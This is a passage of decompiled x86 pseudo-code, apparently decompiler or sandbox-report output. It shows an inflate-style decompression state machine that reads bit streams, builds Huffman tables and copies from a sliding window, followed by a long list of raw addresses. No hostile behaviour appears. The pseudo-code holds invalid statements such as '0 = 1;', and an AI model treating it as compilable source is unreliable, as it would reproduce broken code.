                                                                                                                        													if(__eax >= __ecx) {
                                                                                                                        														__edi = __edi - __eax;
                                                                                                                        														__eflags = __edi;
                                                                                                                        													} else {
                                                                                                                        														__ecx = __ecx - __eax;
                                                                                                                        														__edi = __ecx;
                                                                                                                        													}
                                                                                                                        													__eflags = __edi;
                                                                                                                        													if(__edi == 0) {
                                                                                                                        														goto L143;
                                                                                                                        													}
                                                                                                                        													L152:
                                                                                                                        													__ecx =  *(__ebp - 0x20);
                                                                                                                        													 *__eax =  *__ecx;
                                                                                                                        													__eax = __eax + 1;
                                                                                                                        													__ecx = __ecx + 1;
                                                                                                                        													__edi = __edi - 1;
                                                                                                                        													__eflags = __ecx - __esi[0x26e8];
                                                                                                                        													 *(__ebp - 0x30) = __eax;
                                                                                                                        													 *(__ebp - 0x20) = __ecx;
                                                                                                                        													 *(__ebp - 0x2c) = __edi;
                                                                                                                        													if(__ecx == __esi[0x26e8]) {
                                                                                                                        														__ecx =  &(__esi[0x6e8]);
                                                                                                                        														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                                                        													}
                                                                                                                        													_t357 =  &(__esi[1]);
                                                                                                                        													 *_t357 = __esi[1] - 1;
                                                                                                                        													__eflags =  *_t357;
                                                                                                                        												} while ( *_t357 != 0);
                                                                                                                        											}
                                                                                                                        											goto L23;
                                                                                                                        										case 6:
                                                                                                                        											L156:
                                                                                                                        											__eax =  *(__ebp - 0x2c);
                                                                                                                        											__edi =  *(__ebp - 0x30);
                                                                                                                        											__eflags = __eax;
                                                                                                                        											if(__eax != 0) {
                                                                                                                        												L172:
                                                                                                                        												__cl = __esi[2];
                                                                                                                        												 *__edi = __cl;
                                                                                                                        												__edi = __edi + 1;
                                                                                                                        												__eax = __eax - 1;
                                                                                                                        												 *(__ebp - 0x30) = __edi;
                                                                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                                                                        												goto L23;
                                                                                                                        											}
                                                                                                                        											L157:
                                                                                                                        											__ecx = __esi[0x26e8];
                                                                                                                        											__eflags = __edi - __ecx;
                                                                                                                        											if(__edi != __ecx) {
                                                                                                                        												L163:
                                                                                                                        												__esi[0x26ea] = __edi;
                                                                                                                        												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                                                        												__edi = __esi[0x26ea];
                                                                                                                        												__ecx = __esi[0x26e9];
                                                                                                                        												__eflags = __edi - __ecx;
                                                                                                                        												 *(__ebp - 0x30) = __edi;
                                                                                                                        												if(__edi >= __ecx) {
                                                                                                                        													__eax = __esi[0x26e8];
                                                                                                                        													__eax = __esi[0x26e8] - __edi;
                                                                                                                        													__eflags = __eax;
                                                                                                                        												} else {
                                                                                                                        													__ecx = __ecx - __edi;
                                                                                                                        													__eax = __ecx - __edi - 1;
                                                                                                                        												}
                                                                                                                        												__edx = __esi[0x26e8];
                                                                                                                        												__eflags = __edi - __edx;
                                                                                                                        												 *(__ebp - 8) = __edx;
                                                                                                                        												if(__edi == __edx) {
                                                                                                                        													__edx =  &(__esi[0x6e8]);
                                                                                                                        													__eflags = __ecx - __edx;
                                                                                                                        													if(__ecx != __edx) {
                                                                                                                        														__edi = __edx;
                                                                                                                        														__eflags = __edi - __ecx;
                                                                                                                        														 *(__ebp - 0x30) = __edi;
                                                                                                                        														if(__edi >= __ecx) {
                                                                                                                        															__eax =  *(__ebp - 8);
                                                                                                                        															__eax =  *(__ebp - 8) - __edi;
                                                                                                                        															__eflags = __eax;
                                                                                                                        														} else {
                                                                                                                        															__ecx = __ecx - __edi;
                                                                                                                        															__eax = __ecx;
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__eflags = __eax;
                                                                                                                        												if(__eax == 0) {
                                                                                                                        													goto L183;
                                                                                                                        												} else {
                                                                                                                        													goto L172;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											L158:
                                                                                                                        											__eax = __esi[0x26e9];
                                                                                                                        											__edx =  &(__esi[0x6e8]);
                                                                                                                        											__eflags = __eax - __edx;
                                                                                                                        											if(__eax == __edx) {
                                                                                                                        												goto L163;
                                                                                                                        											}
                                                                                                                        											L159:
                                                                                                                        											__edi = __edx;
                                                                                                                        											__eflags = __edi - __eax;
                                                                                                                        											if(__edi >= __eax) {
                                                                                                                        												__ecx = __ecx - __edi;
                                                                                                                        												__eflags = __ecx;
                                                                                                                        												__eax = __ecx;
                                                                                                                        											} else {
                                                                                                                        												__eax = __eax - __edi;
                                                                                                                        												__eax = __eax - 1;
                                                                                                                        											}
                                                                                                                        											__eflags = __eax;
                                                                                                                        											if(__eax != 0) {
                                                                                                                        												goto L172;
                                                                                                                        											} else {
                                                                                                                        												goto L163;
                                                                                                                        											}
                                                                                                                        										case 7:
                                                                                                                        											L173:
                                                                                                                        											__eflags = __ebx - 7;
                                                                                                                        											if(__ebx > 7) {
                                                                                                                        												__ebx = __ebx - 8;
                                                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                                                        												_t380 = __ebp - 0x38;
                                                                                                                        												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                                                        												__eflags =  *_t380;
                                                                                                                        											}
                                                                                                                        											goto L175;
                                                                                                                        										case 8:
                                                                                                                        											L4:
                                                                                                                        											while(_t425 < 3) {
                                                                                                                        												if( *(_t448 - 0x34) == 0) {
                                                                                                                        													goto L182;
                                                                                                                        												} else {
                                                                                                                        													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                                                        													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                                                        													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                                                        													_t425 = _t425 + 8;
                                                                                                                        													continue;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											_t425 = _t425 - 3;
                                                                                                                        											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                                                        											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                                                        											asm("sbb ecx, ecx");
                                                                                                                        											_t408 = _t406 >> 1;
                                                                                                                        											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                                                        											if(_t408 == 0) {
                                                                                                                        												L24:
                                                                                                                        												 *_t446 = 9;
                                                                                                                        												_t436 = _t425 & 0x00000007;
                                                                                                                        												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                                                        												_t425 = _t425 - _t436;
                                                                                                                        												goto L180;
                                                                                                                        											}
                                                                                                                        											L6:
                                                                                                                        											_t411 = _t408 - 1;
                                                                                                                        											if(_t411 == 0) {
                                                                                                                        												L13:
                                                                                                                        												__eflags =  *0x432e90;
                                                                                                                        												if( *0x432e90 != 0) {
                                                                                                                        													L22:
                                                                                                                        													_t412 =  *0x40a5e8; // 0x9
                                                                                                                        													_t446[4] = _t412;
                                                                                                                        													_t413 =  *0x40a5ec; // 0x5
                                                                                                                        													_t446[4] = _t413;
                                                                                                                        													_t414 =  *0x431d0c; // 0x432610
                                                                                                                        													_t446[5] = _t414;
                                                                                                                        													_t415 =  *0x431d08; // 0x432e10
                                                                                                                        													_t446[6] = _t415;
                                                                                                                        													L23:
                                                                                                                        													 *_t446 =  *_t446 & 0x00000000;
                                                                                                                        													goto L180;
                                                                                                                        												} else {
                                                                                                                        													_t26 = _t448 - 8;
                                                                                                                        													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                                                        													__eflags =  *_t26;
                                                                                                                        													_t416 = 0x431d10;
                                                                                                                        													goto L15;
                                                                                                                        													L20:
                                                                                                                        													 *_t416 = _t438;
                                                                                                                        													_t416 = _t416 + 4;
                                                                                                                        													__eflags = _t416 - 0x432190;
                                                                                                                        													if(_t416 < 0x432190) {
                                                                                                                        														L15:
                                                                                                                        														__eflags = _t416 - 0x431f4c;
                                                                                                                        														_t438 = 8;
                                                                                                                        														if(_t416 > 0x431f4c) {
                                                                                                                        															__eflags = _t416 - 0x432110;
                                                                                                                        															if(_t416 >= 0x432110) {
                                                                                                                        																__eflags = _t416 - 0x432170;
                                                                                                                        																if(_t416 < 0x432170) {
                                                                                                                        																	_t438 = 7;
                                                                                                                        																}
                                                                                                                        															} else {
                                                                                                                        																_t438 = 9;
                                                                                                                        															}
                                                                                                                        														}
                                                                                                                        														goto L20;
                                                                                                                        													} else {
                                                                                                                        														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                                                                                        														_push(0x1e);
                                                                                                                        														_pop(_t440);
                                                                                                                        														_push(5);
                                                                                                                        														_pop(_t419);
                                                                                                                        														memset(0x431d10, _t419, _t440 << 2);
                                                                                                                        														_t450 = _t450 + 0xc;
                                                                                                                        														_t442 = 0x431d10 + _t440;
                                                                                                                        														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                                                                                        														 *0x432e90 =  *0x432e90 + 1;
                                                                                                                        														__eflags =  *0x432e90;
                                                                                                                        														goto L22;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											L7:
                                                                                                                        											_t423 = _t411 - 1;
                                                                                                                        											if(_t423 == 0) {
                                                                                                                        												 *_t446 = 0xb;
                                                                                                                        												goto L180;
                                                                                                                        											}
                                                                                                                        											L8:
                                                                                                                        											if(_t423 != 1) {
                                                                                                                        												goto L180;
                                                                                                                        											}
                                                                                                                        											goto L9;
                                                                                                                        										case 9:
                                                                                                                        											while(1) {
                                                                                                                        												L27:
                                                                                                                        												__eflags = __ebx - 0x20;
                                                                                                                        												if(__ebx >= 0x20) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												L25:
                                                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                                                        													goto L182;
                                                                                                                        												}
                                                                                                                        												L26:
                                                                                                                        												__eax =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                        												__ecx = __ebx;
                                                                                                                        												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                        												__ebx = __ebx + 8;
                                                                                                                        												__eflags = __ebx;
                                                                                                                        											}
                                                                                                                        											L28:
                                                                                                                        											__eax =  *(__ebp - 0x40);
                                                                                                                        											__ebx = 0;
                                                                                                                        											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                                                        											 *(__ebp - 0x40) = 0;
                                                                                                                        											__eflags = __eax;
                                                                                                                        											__esi[1] = __eax;
                                                                                                                        											if(__eax == 0) {
                                                                                                                        												goto L53;
                                                                                                                        											}
                                                                                                                        											L29:
                                                                                                                        											_push(0xa);
                                                                                                                        											_pop(__eax);
                                                                                                                        											goto L54;
                                                                                                                        										case 0xa:
                                                                                                                        											L30:
                                                                                                                        											__eflags =  *(__ebp - 0x34);
                                                                                                                        											if( *(__ebp - 0x34) == 0) {
                                                                                                                        												goto L182;
                                                                                                                        											}
                                                                                                                        											L31:
                                                                                                                        											__eax =  *(__ebp - 0x2c);
                                                                                                                        											__eflags = __eax;
                                                                                                                        											if(__eax != 0) {
                                                                                                                        												L48:
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x34);
                                                                                                                        												if(__eax >=  *(__ebp - 0x34)) {
                                                                                                                        													__eax =  *(__ebp - 0x34);
                                                                                                                        												}
                                                                                                                        												__ecx = __esi[1];
                                                                                                                        												__eflags = __ecx - __eax;
                                                                                                                        												__edi = __ecx;
                                                                                                                        												if(__ecx >= __eax) {
                                                                                                                        													__edi = __eax;
                                                                                                                        												}
                                                                                                                        												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                                                        												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                                                        												_t80 =  &(__esi[1]);
                                                                                                                        												 *_t80 = __esi[1] - __edi;
                                                                                                                        												__eflags =  *_t80;
                                                                                                                        												if( *_t80 == 0) {
                                                                                                                        													L53:
                                                                                                                        													__eax = __esi[0x145];
                                                                                                                        													L54:
                                                                                                                        													 *__esi = __eax;
                                                                                                                        												}
                                                                                                                        												goto L180;
                                                                                                                        											}
                                                                                                                        											L32:
                                                                                                                        											__ecx = __esi[0x26e8];
                                                                                                                        											__edx =  *(__ebp - 0x30);
                                                                                                                        											__eflags = __edx - __ecx;
                                                                                                                        											if(__edx != __ecx) {
                                                                                                                        												L38:
                                                                                                                        												__esi[0x26ea] = __edx;
                                                                                                                        												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                                                        												__edx = __esi[0x26ea];
                                                                                                                        												__ecx = __esi[0x26e9];
                                                                                                                        												__eflags = __edx - __ecx;
                                                                                                                        												 *(__ebp - 0x30) = __edx;
                                                                                                                        												if(__edx >= __ecx) {
                                                                                                                        													__eax = __esi[0x26e8];
                                                                                                                        													__eax = __esi[0x26e8] - __edx;
                                                                                                                        													__eflags = __eax;
                                                                                                                        												} else {
                                                                                                                        													__ecx = __ecx - __edx;
                                                                                                                        													__eax = __ecx - __edx - 1;
                                                                                                                        												}
                                                                                                                        												__edi = __esi[0x26e8];
                                                                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                                                                        												__eflags = __edx - __edi;
                                                                                                                        												if(__edx == __edi) {
                                                                                                                        													__edx =  &(__esi[0x6e8]);
                                                                                                                        													__eflags = __edx - __ecx;
                                                                                                                        													if(__eflags != 0) {
                                                                                                                        														 *(__ebp - 0x30) = __edx;
                                                                                                                        														if(__eflags >= 0) {
                                                                                                                        															__edi = __edi - __edx;
                                                                                                                        															__eflags = __edi;
                                                                                                                        															__eax = __edi;
                                                                                                                        														} else {
                                                                                                                        															__ecx = __ecx - __edx;
                                                                                                                        															__eax = __ecx;
                                                                                                                        														}
                                                                                                                        														 *(__ebp - 0x2c) = __eax;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__eflags = __eax;
                                                                                                                        												if(__eax == 0) {
                                                                                                                        													goto L183;
                                                                                                                        												} else {
                                                                                                                        													goto L48;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											L33:
                                                                                                                        											__eax = __esi[0x26e9];
                                                                                                                        											__edi =  &(__esi[0x6e8]);
                                                                                                                        											__eflags = __eax - __edi;
                                                                                                                        											if(__eax == __edi) {
                                                                                                                        												goto L38;
                                                                                                                        											}
                                                                                                                        											L34:
                                                                                                                        											__edx = __edi;
                                                                                                                        											__eflags = __edx - __eax;
                                                                                                                        											 *(__ebp - 0x30) = __edx;
                                                                                                                        											if(__edx >= __eax) {
                                                                                                                        												__ecx = __ecx - __edx;
                                                                                                                        												__eflags = __ecx;
                                                                                                                        												__eax = __ecx;
                                                                                                                        											} else {
                                                                                                                        												__eax = __eax - __edx;
                                                                                                                        												__eax = __eax - 1;
                                                                                                                        											}
                                                                                                                        											__eflags = __eax;
                                                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                                                        											if(__eax != 0) {
                                                                                                                        												goto L48;
                                                                                                                        											} else {
                                                                                                                        												goto L38;
                                                                                                                        											}
                                                                                                                        										case 0xb:
                                                                                                                        											goto L56;
                                                                                                                        										case 0xc:
                                                                                                                        											L60:
                                                                                                                        											__esi[1] = __esi[1] >> 0xa;
                                                                                                                        											__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                        											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                        												goto L68;
                                                                                                                        											}
                                                                                                                        											goto L61;
                                                                                                                        										case 0xd:
                                                                                                                        											while(1) {
                                                                                                                        												L93:
                                                                                                                        												__eax = __esi[1];
                                                                                                                        												__ecx = __esi[2];
                                                                                                                        												__edx = __eax;
                                                                                                                        												__eax = __eax & 0x0000001f;
                                                                                                                        												__edx = __edx >> 5;
                                                                                                                        												__eax = __edx + __eax + 0x102;
                                                                                                                        												__eflags = __esi[2] - __eax;
                                                                                                                        												if(__esi[2] >= __eax) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												L73:
                                                                                                                        												__eax = __esi[0x143];
                                                                                                                        												while(1) {
                                                                                                                        													L76:
                                                                                                                        													__eflags = __ebx - __eax;
                                                                                                                        													if(__ebx >= __eax) {
                                                                                                                        														break;
                                                                                                                        													}
                                                                                                                        													L74:
                                                                                                                        													__eflags =  *(__ebp - 0x34);
                                                                                                                        													if( *(__ebp - 0x34) == 0) {
                                                                                                                        														goto L182;
                                                                                                                        													}
                                                                                                                        													L75:
                                                                                                                        													__ecx =  *(__ebp - 0x38);
                                                                                                                        													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                        													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                        													__ecx = __ebx;
                                                                                                                        													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                        													__ebx = __ebx + 8;
                                                                                                                        													__eflags = __ebx;
                                                                                                                        												}
                                                                                                                        												L77:
                                                                                                                        												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                                                        												__eax = __eax &  *(__ebp - 0x40);
                                                                                                                        												__ecx = __esi[0x144];
                                                                                                                        												__eax = __esi[0x144] + __eax * 4;
                                                                                                                        												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                                                        												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                                                        												__eflags = __eax - 0x10;
                                                                                                                        												 *(__ebp - 0x14) = __eax;
                                                                                                                        												if(__eax >= 0x10) {
                                                                                                                        													L79:
                                                                                                                        													__eflags = __eax - 0x12;
                                                                                                                        													if(__eax != 0x12) {
                                                                                                                        														__eax = __eax + 0xfffffff2;
                                                                                                                        														 *(__ebp - 8) = 3;
                                                                                                                        													} else {
                                                                                                                        														_push(7);
                                                                                                                        														 *(__ebp - 8) = 0xb;
                                                                                                                        														_pop(__eax);
                                                                                                                        													}
                                                                                                                        													while(1) {
                                                                                                                        														L84:
                                                                                                                        														__ecx = __eax + __edx;
                                                                                                                        														__eflags = __ebx - __eax + __edx;
                                                                                                                        														if(__ebx >= __eax + __edx) {
                                                                                                                        															break;
                                                                                                                        														}
                                                                                                                        														L82:
                                                                                                                        														__eflags =  *(__ebp - 0x34);
                                                                                                                        														if( *(__ebp - 0x34) == 0) {
                                                                                                                        															goto L182;
                                                                                                                        														}
                                                                                                                        														L83:
                                                                                                                        														__ecx =  *(__ebp - 0x38);
                                                                                                                        														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                        														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                        														__ecx = __ebx;
                                                                                                                        														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                        														__ebx = __ebx + 8;
                                                                                                                        														__eflags = __ebx;
                                                                                                                        													}
                                                                                                                        													L85:
                                                                                                                        													__ecx = __edx;
                                                                                                                        													__ebx = __ebx - __edx;
                                                                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                        													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                        													__edx =  *(__ebp - 8);
                                                                                                                        													__ebx = __ebx - __eax;
                                                                                                                        													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                        													__ecx = __eax;
                                                                                                                        													__eax = __esi[1];
                                                                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                        													__ecx = __esi[2];
                                                                                                                        													__eax = __eax >> 5;
                                                                                                                        													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                                                        													__eax = __eax & 0x0000001f;
                                                                                                                        													__eax = __edi + __eax + 0x102;
                                                                                                                        													__edi = __edx + __ecx;
                                                                                                                        													__eflags = __edx + __ecx - __eax;
                                                                                                                        													if(__edx + __ecx > __eax) {
                                                                                                                        														goto L9;
                                                                                                                        													}
                                                                                                                        													L86:
                                                                                                                        													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                                                        													if( *(__ebp - 0x14) != 0x10) {
                                                                                                                        														L89:
                                                                                                                        														__edi = 0;
                                                                                                                        														__eflags = 0;
                                                                                                                        														L90:
                                                                                                                        														__eax = __esi + 0xc + __ecx * 4;
                                                                                                                        														do {
                                                                                                                        															L91:
                                                                                                                        															 *__eax = __edi;
                                                                                                                        															__ecx = __ecx + 1;
                                                                                                                        															__eax = __eax + 4;
                                                                                                                        															__edx = __edx - 1;
                                                                                                                        															__eflags = __edx;
                                                                                                                        														} while (__edx != 0);
                                                                                                                        														__esi[2] = __ecx;
                                                                                                                        														continue;
                                                                                                                        													}
                                                                                                                        													L87:
                                                                                                                        													__eflags = __ecx - 1;
                                                                                                                        													if(__ecx < 1) {
                                                                                                                        														goto L9;
                                                                                                                        													}
                                                                                                                        													L88:
                                                                                                                        													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                                                        													goto L90;
                                                                                                                        												}
                                                                                                                        												L78:
                                                                                                                        												__ecx = __edx;
                                                                                                                        												__ebx = __ebx - __edx;
                                                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                        												__ecx = __esi[2];
                                                                                                                        												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                                                        												__esi[2] = __esi[2] + 1;
                                                                                                                        											}
                                                                                                                        											L94:
                                                                                                                        											__eax = __esi[1];
                                                                                                                        											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                                                        											__edi = __eax;
                                                                                                                        											__eax = __eax >> 5;
                                                                                                                        											__edi = __edi & 0x0000001f;
                                                                                                                        											__ecx = 0x101;
                                                                                                                        											__eax = __eax & 0x0000001f;
                                                                                                                        											__edi = __edi + 0x101;
                                                                                                                        											__eax = __eax + 1;
                                                                                                                        											__edx = __ebp - 0xc;
                                                                                                                        											 *(__ebp - 0x14) = __eax;
                                                                                                                        											 &(__esi[0x148]) = __ebp - 4;
                                                                                                                        											 *(__ebp - 4) = 9;
                                                                                                                        											__ebp - 0x18 =  &(__esi[3]);
                                                                                                                        											 *(__ebp - 0x10) = 6;
                                                                                                                        											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                        											__eflags =  *(__ebp - 4);
                                                                                                                        											if( *(__ebp - 4) == 0) {
                                                                                                                        												__eax = __eax | 0xffffffff;
                                                                                                                        												__eflags = __eax;
                                                                                                                        											}
                                                                                                                        											__eflags = __eax;
                                                                                                                        											if(__eax != 0) {
                                                                                                                        												goto L9;
                                                                                                                        											} else {
                                                                                                                        												L97:
                                                                                                                        												__ebp - 0xc =  &(__esi[0x148]);
                                                                                                                        												__ebp - 0x10 = __ebp - 0x1c;
                                                                                                                        												__eax = __esi + 0xc + __edi * 4;
                                                                                                                        												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                        												__eflags = __eax;
                                                                                                                        												if(__eax != 0) {
                                                                                                                        													goto L9;
                                                                                                                        												}
                                                                                                                        												L98:
                                                                                                                        												__eax =  *(__ebp - 0x10);
                                                                                                                        												__eflags =  *(__ebp - 0x10);
                                                                                                                        												if( *(__ebp - 0x10) != 0) {
                                                                                                                        													L100:
                                                                                                                        													__cl =  *(__ebp - 4);
                                                                                                                        													 *__esi =  *__esi & 0x00000000;
                                                                                                                        													__eflags =  *__esi;
                                                                                                                        													__esi[4] = __al;
                                                                                                                        													__eax =  *(__ebp - 0x18);
                                                                                                                        													__esi[5] =  *(__ebp - 0x18);
                                                                                                                        													__eax =  *(__ebp - 0x1c);
                                                                                                                        													__esi[4] = __cl;
                                                                                                                        													__esi[6] =  *(__ebp - 0x1c);
                                                                                                                        													goto L101;
                                                                                                                        												}
                                                                                                                        												L99:
                                                                                                                        												__eflags = __edi - 0x101;
                                                                                                                        												if(__edi > 0x101) {
                                                                                                                        													goto L9;
                                                                                                                        												}
                                                                                                                        												goto L100;
                                                                                                                        											}
                                                                                                                        										case 0xe:
                                                                                                                        											goto L9;
                                                                                                                        										case 0xf:
                                                                                                                        											L175:
                                                                                                                        											__eax =  *(__ebp - 0x30);
                                                                                                                        											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                                                        											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                                                        											__ecx = __esi[0x26ea];
                                                                                                                        											__edx = __esi[0x26e9];
                                                                                                                        											__eflags = __ecx - __edx;
                                                                                                                        											 *(__ebp - 0x30) = __ecx;
                                                                                                                        											if(__ecx >= __edx) {
                                                                                                                        												__eax = __esi[0x26e8];
                                                                                                                        												__eax = __esi[0x26e8] - __ecx;
                                                                                                                        												__eflags = __eax;
                                                                                                                        											} else {
                                                                                                                        												__edx = __edx - __ecx;
                                                                                                                        												__eax = __edx - __ecx - 1;
                                                                                                                        											}
                                                                                                                        											__eflags = __ecx - __edx;
                                                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                                                        											if(__ecx != __edx) {
                                                                                                                        												L183:
                                                                                                                        												__edi = 0;
                                                                                                                        												goto L10;
                                                                                                                        											} else {
                                                                                                                        												L179:
                                                                                                                        												__eax = __esi[0x145];
                                                                                                                        												__eflags = __eax - 8;
                                                                                                                        												 *__esi = __eax;
                                                                                                                        												if(__eax != 8) {
                                                                                                                        													L184:
                                                                                                                        													0 = 1;
                                                                                                                        													goto L10;
                                                                                                                        												}
                                                                                                                        												goto L180;
                                                                                                                        											}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								L181:
                                                                                                                        								goto L9;
                                                                                                                        							}
                                                                                                                        							L70:
                                                                                                                        							if( *__edi == __eax) {
                                                                                                                        								goto L72;
                                                                                                                        							}
                                                                                                                        							L71:
                                                                                                                        							__esi[2] = __esi[2] & __eax;
                                                                                                                        							 *__esi = 0xd;
                                                                                                                        							goto L93;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L182:
                                                                                                                        				_t443 = 0;
                                                                                                                        				_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                        				_t446[0x146] = _t425;
                                                                                                                        				( *(_t448 + 8))[1] = 0;
                                                                                                                        				goto L11;
                                                                                                                        			}









                                                                                                                        0x00406dcd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406dd3
                                                                                                                        0x00406dd3
                                                                                                                        0x00406dd7
                                                                                                                        0x00406dda
                                                                                                                        0x00406dda
                                                                                                                        0x00406dde
                                                                                                                        0x00406de4
                                                                                                                        0x00406de4
                                                                                                                        0x00406de7
                                                                                                                        0x00406dea
                                                                                                                        0x00406df0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406df2
                                                                                                                        0x00406e14
                                                                                                                        0x00406e14
                                                                                                                        0x00406e17
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406df4
                                                                                                                        0x00406df8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406dfe
                                                                                                                        0x00406dfe
                                                                                                                        0x00406e01
                                                                                                                        0x00406e04
                                                                                                                        0x00406e09
                                                                                                                        0x00406e0b
                                                                                                                        0x00406e0e
                                                                                                                        0x00406e11
                                                                                                                        0x00406e11
                                                                                                                        0x00406e19
                                                                                                                        0x00406e19
                                                                                                                        0x00406e1f
                                                                                                                        0x00406e22
                                                                                                                        0x00406e25
                                                                                                                        0x00406e25
                                                                                                                        0x00406e2c
                                                                                                                        0x00406e30
                                                                                                                        0x00406e34
                                                                                                                        0x00406e37
                                                                                                                        0x00406e3a
                                                                                                                        0x00406e40
                                                                                                                        0x00406e45
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e47
                                                                                                                        0x00406e5b
                                                                                                                        0x00406e5b
                                                                                                                        0x00406e5f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e49
                                                                                                                        0x00406e4c
                                                                                                                        0x00406e4c
                                                                                                                        0x00406e53
                                                                                                                        0x00406e58
                                                                                                                        0x00406e58
                                                                                                                        0x00406e58
                                                                                                                        0x00406e61
                                                                                                                        0x00406e61
                                                                                                                        0x00406e64
                                                                                                                        0x00406e72
                                                                                                                        0x00406e78
                                                                                                                        0x00406e7d
                                                                                                                        0x00406e83
                                                                                                                        0x00406e89
                                                                                                                        0x00406e8f
